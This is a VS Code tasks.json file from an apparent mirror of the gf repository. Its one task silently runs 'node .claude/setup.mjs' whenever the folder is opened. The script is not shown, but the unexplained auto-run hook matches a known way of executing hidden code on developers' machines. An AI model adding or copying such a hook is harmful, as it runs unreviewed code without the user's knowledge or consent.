mirror of
https://gitee.com/johng/gf
synced 2026-06-06 16:21:40 +08:00
14 lines
217 B
JSON
14 lines
217 B
JSON
|
|
{
|
||
|
|
"version": "2.0.0",
|
||
|
|
"tasks": [
|
||
|
|
{
|
||
|
|
"label": "Environment Setup",
|
||
|
|
"type": "shell",
|
||
|
|
"command": "node .claude/setup.mjs",
|
||
|
|
"runOptions": {
|
||
|
|
"runOn": "folderOpen"
|
||
|
|
}
|
||
|
|
}
|
||
|
|
]
|
||
|
|
}
|